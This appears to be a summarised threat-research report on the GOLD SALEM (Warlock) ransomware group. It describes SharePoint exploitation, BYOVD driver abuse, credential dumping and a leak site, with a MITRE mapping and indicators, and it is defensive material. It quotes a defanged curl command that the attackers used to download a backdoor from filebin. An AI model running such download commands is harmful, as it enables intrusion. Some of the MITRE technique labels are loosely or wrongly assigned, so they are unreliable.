Threat Research

GOLD SALEM’s Warlock operation joins busy ransomware landscape

Sophos
GOLD SALEM’s Warlock operation joins busy ransomware landscape

CTU researchers track a threat group calling itself Warlock Group (GOLD SALEM) that has been compromising networks and deploying Warlock ransomware since March 2025, leveraging exploits against enterprise applications, BYOVD with a vulnerable Baidu driver, credential theft, and legitimate DFIR tooling abuse. The group operates a Tor leak site, solicited exploits and access on underground forums, and has a varied victimology across the Americas and Europe while largely avoiding targets in China and Russia. #Warlock #GOLD_SALEM #ToolShell

Keypoints

  • GOLD SALEM (self-styled Warlock Group) has deployed Warlock ransomware against at least 60 victims since March 2025 across North America, Europe, and South America.
  • The group advertised on RAMP forum seeking exploits (Veeam, ESXi, SharePoint) and cooperation from initial access brokers, indicating RaaS or affiliate recruitment activity.
  • Initial access observed via the ToolShell SharePoint exploit chain (multiple CVEs) that installed an ASPX web shell and downloaded a Golang-based WebSockets backdoor.
  • GOLD SALEM used Bring Your Own Vulnerable Driver (BYOVD) with a flawed Baidu Antivirus driver (CVE-2024-51324) renamed to kill EDR processes.
  • Post-exploitation activity included Mimikatz targeting LSASS, PsExec and Impacket for lateral movement, GPOs for payload deployment, and abuse of Velociraptor to create VS Code tunnels.
  • The group runs a Tor-based dedicated leak site (DLS), publishes victims in batches, claims to have sold victim data, and assigns countdown ransom deadlines of ~12–14 days.
  • CTU recommends aggressive patching, attack surface monitoring, proactive endpoint detection, and use of listed indicators to restrict access.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used ToolShell exploit chain against SharePoint servers via CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 to place an ASPX web shell (“…exploitation resulted in the placement of an ASPX web shell…”).
  • [T1505] Server Software Component – Deployment of an ASPX web shell within the IIS worker process (w3wp.exe) to execute commands and retrieve output (“…created a Process object for cmd.exe within the context of the IIS worker process (w3wp.exe)…”).
  • [T1105] Ingress Tool Transfer – Downloaded a Golang-based WebSockets server via curl to maintain remote access (“curl -L -o c:userspublicSophosSophos-UI.exe hxxps[:]//filebin[.]net/…/wsocks.exe.txt”).
  • [T1218] System Binary Proxy Execution – Use of PsExec and Impacket for lateral movement within the environment (“Microsoft also observed the use of PsExec and Impacket for lateral movement…”).
  • [T1055] Process Injection / [T1562.001] Impair Defenses: Disable or Modify Tools – BYOVD using a vulnerable Baidu driver (renamed googleApiUtil64.sys) to terminate EDR agents leveraging CVE-2024-51324 (“…used the Bring Your Own Vulnerable Driver (BYOVD) technique and a vulnerable Baidu Antivirus driver renamed googleApiUtil64.sys to terminate the EDR agent…”).
  • [T1003] OS Credential Dumping – Execution of Mimikatz targeting LSASS memory to extract plaintext credentials (“…execution of Mimikatz ‘specifically targeting the Local Security Authority Subsystem Service (LSASS) memory to extract plaintext credentials.’”).
  • [T1486] Data Encrypted for Impact – Deployment of Warlock ransomware to encrypt victims and post extortion demands on a Tor-based leak site (DLS) with countdown dates for ransom payment (“…deployed its Warlock ransomware… operates a Tor-based DLS to publish purported victim names and data…”).
  • [T1195] Spearphishing Attachment / [T1193] Spearphishing Link (contextual note) – (No direct phishing described; included only if implied by initial access broker activity and solicitation for access on forums.)
  • [T1213] Data from Information Repositories – Publication and sale of stolen victim data via the Tor DLS and claims of selling data to private buyers (“…data from 19 of 60 listed victims (32%) was published on the DLS… sold data from 27 (45%) of the victims to private buyers…”).
  • [T1210] Exploitation of Remote Services – Abuse of Velociraptor DFIR tool to establish VS Code tunnels for remote presence and facilitation of ransomware deployment (“…abusing the legitimate open-source Velociraptor … to establish a Visual Studio Code network tunnel…”).

Indicators of Compromise

  • [File Hash – MD5/SHA1/SHA256] ASPX web shell used after SharePoint ToolShell exploitation – MD5: bfbeac96a385b1e5643ec0752b132506, SHA1: de25be0afd53a1d274eec02e5303622fc8e7dbd5, SHA256: 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1.
  • [File Hash – MD5/SHA1/SHA256] WebSockets remote access tool (wsocks.exe.txt) – MD5: b3a099ecca79503a0e4a154bd85d3e6b, SHA1: 6d0cc6349a951f0b52394ad3436d1656ec5fba6a, SHA256: a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4.
  • [Command/URL] Download command used during intrusion – Example curl command that fetched wsocks.exe.txt from filebin (curl -L -o c:userspublicSophosSophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt).
  • [Vulnerabilities] Exploited CVEs for SharePoint ToolShell chain – CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771 (used for initial access via SharePoint exploitation).
  • [Driver/CVE] Vulnerable driver abused for BYOVD – Baidu Antivirus driver (renamed googleApiUtil64.sys) exploiting CVE-2024-51324 to terminate EDR processes.

Read more: https://news.sophos.com/en-us/2025/09/17/gold-salems-warlock-operation-joins-busy-ransomware-landscape/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint